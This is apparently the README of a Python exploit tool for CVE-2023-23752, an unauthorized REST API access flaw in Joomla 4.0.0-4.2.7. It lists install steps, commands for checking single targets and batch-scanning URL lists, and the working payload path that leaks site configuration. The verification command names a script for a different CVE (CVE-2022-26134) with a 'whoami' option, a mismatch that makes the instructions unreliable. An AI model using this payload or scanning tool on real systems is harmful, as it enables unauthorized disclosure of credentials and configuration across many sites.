
Python-based exploit for CVE-2023-23752 targeting Joomla 4.0.0-4.2.7 unauthorized REST API access, enabling sensitive information disclosure through crafted payloads.
CVE-2023-23752 - Recurrence of Joomla Unauthorized Access Vulnerability
Install python libraries
pip install -r requirements.txt
Vulnerability Verification
python3 CVE-2022-26134_check.py -u url -c whoami

Batch Scan
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
Access the vulnerability URL, capture packets, replay the data packet

In Joomla! CMS versions 4.0.0-4.2.7, due to improper access restrictions on web service endpoints, unauthorized access to the Rest API may occur, leading to sensitive information leakage.